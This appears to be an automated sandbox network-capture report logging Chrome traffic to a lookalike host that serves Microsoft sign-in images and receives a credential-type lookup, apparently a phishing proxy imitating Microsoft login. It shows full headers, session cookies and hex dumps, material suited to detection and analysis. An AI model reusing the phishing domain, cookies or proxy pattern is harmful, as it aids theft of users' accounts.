                                                        2025-03-17 16:42:54 UTC3620INData Raw: 47 49 46 38 39 61 60 01 03 00 f0 00 00 00 00 00 69 69 69 21 f9 04 09 05 00 00 00 21 fe 26 45 64 69 74 65 64 20 77 69 74 68 20 65 7a 67 69 66 2e 63 6f 6d 20 6f 6e 6c 69 6e 65 20 47 49 46 20 6d 61 6b 65 72 00 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 36 84 1d a9 b7 07 ed 50 8a 6c d2 8b b3 de bc fb 0f 86 e2 48 96 e6 89 a2 0a 04 49 01 d6 3a 71 4a d7 f6 8d e7 fa ce 6b ab f5 00 ba 60 42 59 b1 87 4c 2a 97 cc 26 af 00 00 21 f9 04 09 05 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 39 84 1f 69 19 07 ec 96 8a b2 51 34 af de bc fb 0f 86 e2 48 96 e6 89 a6 6a 0a 3d 99 6b 39 2d 35 5f f5 8a e7 fa ce f7 fe 0f 8c b4 6a 37 98 a6 28 7b 05 97 cc a6 f3 09 d5 15 00 00 21 f9 04 09 03 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 39 84 0f
                                                        Data Ascii: GIF89a`iii!!&Edited with ezgif.com online GIF maker!NETSCAPE2.0,`6PlHI:qJk`BYL*&!,`9iQ4Hj=k9-5_j7({!,`9


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        40192.168.2.44979023.95.206.2314436224C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-17 16:42:54 UTC1952OUTGET /aadcdn.msauth.net/~/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1
                                                        Host: hapiinenstys.criadordeconexoes.com.br
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; OH.FLID=e4bebde7-5ba4-49d8-b476-931756888516; .AspNetCore.OpenIdConnect.Nonce.49USBfOQied3yWeklneNnBRgMp5V6TCkW50B00X8sZN6-08gUP7C4VT8ltpLeyjKw6t0mWmXCmBMRZb3H0ziB4fa6mZ1mkbAWHlQ5aw3TxS6XAWJfHgahBcWIu2vzNCIOPDrnm96RaYKqI-252pJ-UZjV7QUHfdMfKdYx1uHnSjp6-HfVfS3Kmq9tXZM2YhpqlGz5i1CuYbEO2fzxB7icNR4fUgESr_VGJC8OYz2CXPlROML_6eU_GrG417A1wJo=N; .AspNetCore.Correlation.ZMc9lLc8XG_FHA7AsKemKsGhCyJShH-wCn7fNfhS9zc=N; esctx-jkXTnxbCM=AQABCQEAAABVrSpeuWamRam2jAF1XRQEDNAk-B-2E58z_H0-QJLvGLCw396iyFQ0SQlwZgT_rkZMOjIX0BlREk7SdS_3Gjck40Z4fztkvwmcn1sQXSriR2IzpxLrG5sEdaAuFg4w1VF7xM9sRR01IbnLTCxFsZcflc2zCEZkG2HUgNsPDnuWAiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AXUAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAB1AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEVTA4RXRMIoxXIbr9n-iyLGrqtPHzQRAW7rkde36tgl54eAYfT65Cw1l2I1F_yOUHXQ4Bf1-8uxohLxNhP3vhk1hOwXrHhhSan6gxhQJ0vFwgAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEF9qztFF8T [TRUNCATED]
                                                        2025-03-17 16:42:54 UTC786INHTTP/1.1 200 OK
                                                        Date: Mon, 17 Mar 2025 16:42:54 GMT
                                                        Content-Type: image/svg+xml
                                                        Content-Length: 1435
                                                        Connection: close
                                                        Cache-Control: public, max-age=31536000
                                                        Content-Encoding: gzip
                                                        Last-Modified: Fri, 17 Jan 2020 19:28:38 GMT
                                                        ETag: 0x8D79B8373CB2849
                                                        x-ms-request-id: 0042a91e-201e-001e-805b-972f8e000000
                                                        x-ms-version: 2009-09-19
                                                        x-ms-lease-status: unlocked
                                                        x-ms-blob-type: BlockBlob
                                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                        Access-Control-Allow-Origin: *
                                                        x-azure-ref: 20250317T164254Z-17fdc58fdbcvtxmhhC1NYCt4b800000006q0000000002nn0
                                                        x-fd-int-roxy-purgeid: 4554691
                                                        X-Cache: TCP_MISS
                                                        Accept-Ranges: bytes
                                                        2025-03-17 16:42:54 UTC1435INData Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5
                                                        Data Ascii: WMo7+uVHJ{&v(QFaWQ|~|{~b{8zv8|bgxby{x<\lSppl7o}vtrr|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        41192.168.2.44979223.95.206.2314436224C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-17 16:42:54 UTC1951OUTGET /aadcdn.msauth.net/~/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1
                                                        Host: hapiinenstys.criadordeconexoes.com.br
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; OH.FLID=e4bebde7-5ba4-49d8-b476-931756888516; .AspNetCore.OpenIdConnect.Nonce.49USBfOQied3yWeklneNnBRgMp5V6TCkW50B00X8sZN6-08gUP7C4VT8ltpLeyjKw6t0mWmXCmBMRZb3H0ziB4fa6mZ1mkbAWHlQ5aw3TxS6XAWJfHgahBcWIu2vzNCIOPDrnm96RaYKqI-252pJ-UZjV7QUHfdMfKdYx1uHnSjp6-HfVfS3Kmq9tXZM2YhpqlGz5i1CuYbEO2fzxB7icNR4fUgESr_VGJC8OYz2CXPlROML_6eU_GrG417A1wJo=N; .AspNetCore.Correlation.ZMc9lLc8XG_FHA7AsKemKsGhCyJShH-wCn7fNfhS9zc=N; esctx-jkXTnxbCM=AQABCQEAAABVrSpeuWamRam2jAF1XRQEDNAk-B-2E58z_H0-QJLvGLCw396iyFQ0SQlwZgT_rkZMOjIX0BlREk7SdS_3Gjck40Z4fztkvwmcn1sQXSriR2IzpxLrG5sEdaAuFg4w1VF7xM9sRR01IbnLTCxFsZcflc2zCEZkG2HUgNsPDnuWAiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AXUAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAB1AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEVTA4RXRMIoxXIbr9n-iyLGrqtPHzQRAW7rkde36tgl54eAYfT65Cw1l2I1F_yOUHXQ4Bf1-8uxohLxNhP3vhk1hOwXrHhhSan6gxhQJ0vFwgAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEF9qztFF8T [TRUNCATED]
                                                        2025-03-17 16:42:54 UTC806INHTTP/1.1 200 OK
                                                        Date: Mon, 17 Mar 2025 16:42:54 GMT
                                                        Content-Type: image/svg+xml
                                                        Content-Length: 673
                                                        Connection: close
                                                        Cache-Control: public, max-age=31536000
                                                        Content-Encoding: gzip
                                                        Last-Modified: Wed, 12 Feb 2020 22:01:30 GMT
                                                        ETag: 0x8D7B0071D86E386
                                                        x-ms-request-id: 1018200e-f01e-007c-565b-97d204000000
                                                        x-ms-version: 2009-09-19
                                                        x-ms-lease-status: unlocked
                                                        x-ms-blob-type: BlockBlob
                                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                        Access-Control-Allow-Origin: *
                                                        x-azure-ref: 20250317T164254Z-r1769bfd58bwqjslhC1YTOs0pn0000000370000000009qcr
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache-Info: L2_T2
                                                        X-Cache: TCP_REMOTE_HIT
                                                        Accept-Ranges: bytes
                                                        2025-03-17 16:42:54 UTC673INData Raw: 1f 8b 08 00 00 00 00 00 04 00 b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01 21 02 39 81 41
                                                        Data Ascii: Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq*~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1*#vGal9!9A


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        42192.168.2.44979523.95.206.2314436224C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-17 16:43:02 UTC3308OUTGET /aadcdn.msauth.net/~/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg HTTP/1.1
                                                        Host: hapiinenstys.criadordeconexoes.com.br
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1pZD0zOTE5ZDJiOC1lZjIwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3NraD [TRUNCATED]
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; OH.FLID=e4bebde7-5ba4-49d8-b476-931756888516; .AspNetCore.OpenIdConnect.Nonce.49USBfOQied3yWeklneNnBRgMp5V6TCkW50B00X8sZN6-08gUP7C4VT8ltpLeyjKw6t0mWmXCmBMRZb3H0ziB4fa6mZ1mkbAWHlQ5aw3TxS6XAWJfHgahBcWIu2vzNCIOPDrnm96RaYKqI-252pJ-UZjV7QUHfdMfKdYx1uHnSjp6-HfVfS3Kmq9tXZM2YhpqlGz5i1CuYbEO2fzxB7icNR4fUgESr_VGJC8OYz2CXPlROML_6eU_GrG417A1wJo=N; .AspNetCore.Correlation.ZMc9lLc8XG_FHA7AsKemKsGhCyJShH-wCn7fNfhS9zc=N; esctx-jkXTnxbCM=AQABCQEAAABVrSpeuWamRam2jAF1XRQEDNAk-B-2E58z_H0-QJLvGLCw396iyFQ0SQlwZgT_rkZMOjIX0BlREk7SdS_3Gjck40Z4fztkvwmcn1sQXSriR2IzpxLrG5sEdaAuFg4w1VF7xM9sRR01IbnLTCxFsZcflc2zCEZkG2HUgNsPDnuWAiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AXUAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAB1AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEVTA4RXRMIoxXIbr9n-iyLGrqtPHzQRAW7rkde36tgl54eAYfT65Cw1l2I1F_yOUHXQ4Bf1-8uxohLxNhP3vhk1hOwXrHhhSan6gxhQJ0vFwgAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEF9qztFF8T [TRUNCATED]
                                                        2025-03-17 16:43:02 UTC778INHTTP/1.1 200 OK
                                                        Date: Mon, 17 Mar 2025 16:43:02 GMT
                                                        Content-Type: image/svg+xml
                                                        Content-Length: 621
                                                        Connection: close
                                                        Cache-Control: public, max-age=31536000
                                                        Content-Encoding: gzip
                                                        Last-Modified: Tue, 10 Nov 2020 03:41:24 GMT
                                                        ETag: 0x8D8852A7FA6B761
                                                        x-ms-request-id: c00ae726-201e-0006-4f44-978756000000
                                                        x-ms-version: 2009-09-19
                                                        x-ms-lease-status: unlocked
                                                        x-ms-blob-type: BlockBlob
                                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                        Access-Control-Allow-Origin: *
                                                        x-azure-ref: 20250317T164302Z-186895dd8bdmqlthhC1EWRay9g00000006tg00000000aa2b
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2025-03-17 16:43:02 UTC621INData Raw: 1f 8b 08 00 00 00 00 00 04 00 7d 55 4d 6f 22 31 0c fd 2b a3 d9 ab 93 c9 f7 47 3b 20 cd 9e 38 6c af 1c b8 4d 0b 05 24 0a 55 19 41 57 ab fe f7 b5 93 a0 55 61 58 0d d8 60 27 ef 3d db 09 b4 c7 d3 ba fa 7c db ed 8f 93 7a 33 0c ef 0f 4d 73 3e 9f f9 59 f3 c3 c7 ba 51 42 88 06 57 d4 d5 79 bb 1c 36 93 da 84 ba da ac b6 eb cd 90 3f 9f b6 ab f3 cf c3 e7 a4 16 95 a8 4c c0 57 3d 6d 97 ab d7 e3 b4 3d 0e bf 77 ab 29 ef ff bc 6e 77 bb 87 fd 61 bf 7a fc e2 cf f9 db 0f 23 e8 79 fc 6a 9b bc ac 6d f2 a6 8f d5 cb 50 bd ec fa 23 ca e9 ef b1 36 d3 f6 bd 1f 36 97 75 cf 75 b5 9c d4 4f 46 80 56 dc fa 30 37 62 a6 d5 5c bb 99 0a 73 ad 66 ca cc 55 e0 de b9 4e 0a ee 42 84 e2 04 3e 12 64 04 2d 7a 0c a5 78 89 32 cb ad f1 4c 72 0b 52 72 29 dc c5 e5 ac e2 4a 46 cc 7a 19 3b 4c 68 af a1 b8
                                                        Data Ascii: }UMo"1+G; 8lM$UAWUaX`'=|z3Ms>YQBWy6?LW=m=w)nwaz#yjmP#66uuOFV07b\sfUNB>d-zx2LrRr)JFz;Lh


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        43192.168.2.44979723.95.206.2314436224C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-17 16:43:04 UTC1952OUTGET /aadcdn.msauth.net/~/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg HTTP/1.1
                                                        Host: hapiinenstys.criadordeconexoes.com.br
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; OH.FLID=e4bebde7-5ba4-49d8-b476-931756888516; .AspNetCore.OpenIdConnect.Nonce.49USBfOQied3yWeklneNnBRgMp5V6TCkW50B00X8sZN6-08gUP7C4VT8ltpLeyjKw6t0mWmXCmBMRZb3H0ziB4fa6mZ1mkbAWHlQ5aw3TxS6XAWJfHgahBcWIu2vzNCIOPDrnm96RaYKqI-252pJ-UZjV7QUHfdMfKdYx1uHnSjp6-HfVfS3Kmq9tXZM2YhpqlGz5i1CuYbEO2fzxB7icNR4fUgESr_VGJC8OYz2CXPlROML_6eU_GrG417A1wJo=N; .AspNetCore.Correlation.ZMc9lLc8XG_FHA7AsKemKsGhCyJShH-wCn7fNfhS9zc=N; esctx-jkXTnxbCM=AQABCQEAAABVrSpeuWamRam2jAF1XRQEDNAk-B-2E58z_H0-QJLvGLCw396iyFQ0SQlwZgT_rkZMOjIX0BlREk7SdS_3Gjck40Z4fztkvwmcn1sQXSriR2IzpxLrG5sEdaAuFg4w1VF7xM9sRR01IbnLTCxFsZcflc2zCEZkG2HUgNsPDnuWAiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AXUAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAB1AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEVTA4RXRMIoxXIbr9n-iyLGrqtPHzQRAW7rkde36tgl54eAYfT65Cw1l2I1F_yOUHXQ4Bf1-8uxohLxNhP3vhk1hOwXrHhhSan6gxhQJ0vFwgAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEF9qztFF8T [TRUNCATED]
                                                        2025-03-17 16:43:05 UTC778INHTTP/1.1 200 OK
                                                        Date: Mon, 17 Mar 2025 16:43:04 GMT
                                                        Content-Type: image/svg+xml
                                                        Content-Length: 621
                                                        Connection: close
                                                        Cache-Control: public, max-age=31536000
                                                        Content-Encoding: gzip
                                                        Last-Modified: Tue, 10 Nov 2020 03:41:24 GMT
                                                        ETag: 0x8D8852A7FA6B761
                                                        x-ms-request-id: c00ae726-201e-0006-4f44-978756000000
                                                        x-ms-version: 2009-09-19
                                                        x-ms-lease-status: unlocked
                                                        x-ms-blob-type: BlockBlob
                                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                        Access-Control-Allow-Origin: *
                                                        x-azure-ref: 20250317T164304Z-186895dd8bdx922jhC1EWRcnfs00000007e0000000008xyr
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2025-03-17 16:43:05 UTC621INData Raw: 1f 8b 08 00 00 00 00 00 04 00 7d 55 4d 6f 22 31 0c fd 2b a3 d9 ab 93 c9 f7 47 3b 20 cd 9e 38 6c af 1c b8 4d 0b 05 24 0a 55 19 41 57 ab fe f7 b5 93 a0 55 61 58 0d d8 60 27 ef 3d db 09 b4 c7 d3 ba fa 7c db ed 8f 93 7a 33 0c ef 0f 4d 73 3e 9f f9 59 f3 c3 c7 ba 51 42 88 06 57 d4 d5 79 bb 1c 36 93 da 84 ba da ac b6 eb cd 90 3f 9f b6 ab f3 cf c3 e7 a4 16 95 a8 4c c0 57 3d 6d 97 ab d7 e3 b4 3d 0e bf 77 ab 29 ef ff bc 6e 77 bb 87 fd 61 bf 7a fc e2 cf f9 db 0f 23 e8 79 fc 6a 9b bc ac 6d f2 a6 8f d5 cb 50 bd ec fa 23 ca e9 ef b1 36 d3 f6 bd 1f 36 97 75 cf 75 b5 9c d4 4f 46 80 56 dc fa 30 37 62 a6 d5 5c bb 99 0a 73 ad 66 ca cc 55 e0 de b9 4e 0a ee 42 84 e2 04 3e 12 64 04 2d 7a 0c a5 78 89 32 cb ad f1 4c 72 0b 52 72 29 dc c5 e5 ac e2 4a 46 cc 7a 19 3b 4c 68 af a1 b8
                                                        Data Ascii: }UMo"1+G; 8lM$UAWUaX`'=|z3Ms>YQBWy6?LW=m=w)nwaz#yjmP#66uuOFV07b\sfUNB>d-zx2LrRr)JFz;Lh


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        44192.168.2.44980723.95.206.2314436224C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-17 16:43:29 UTC3800OUTPOST /common/GetCredentialType?mkt=en-US HTTP/1.1
                                                        Host: hapiinenstys.criadordeconexoes.com.br
                                                        Connection: keep-alive
                                                        Content-Length: 1952
                                                        sec-ch-ua-platform: "Windows"
                                                        hpgid: 1104
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        hpgact: 1800
                                                        canary: PAQABDgEAAABVrSpeuWamRam2jAF1XRQEPCaC6aO7MJADw_LV9wHEMm6U_2l2SPVfhonabL16mvpRGimF7fgNWj19XDjaVqZhXn561x4aXgU4vZCnboUZUS7wcnMHdFAp1JIVuVAgHAeOmSaPdIJj09urY-qMOxQzGGZgNtqyrLyNeEj6AV7cTcANzRVpPvVZaRmrVWoRORRWrdLagDXae_L5PYGXIpFzj7--4rMRUp7jz-vqSuR8SCAA
                                                        sec-ch-ua-mobile: ?0
                                                        client-request-id: 3919d2b8-ef20-4407-9286-cb3e9c1aba71
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: application/json
                                                        hpgrequestid: df72b11c-05c4-422e-91e3-b22c98b74700
                                                        Content-type: application/json; charset=UTF-8
                                                        Origin: https://hapiinenstys.criadordeconexoes.com.br
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1pZD0zOTE5ZDJiOC1lZjIwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3NraD [TRUNCATED]
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
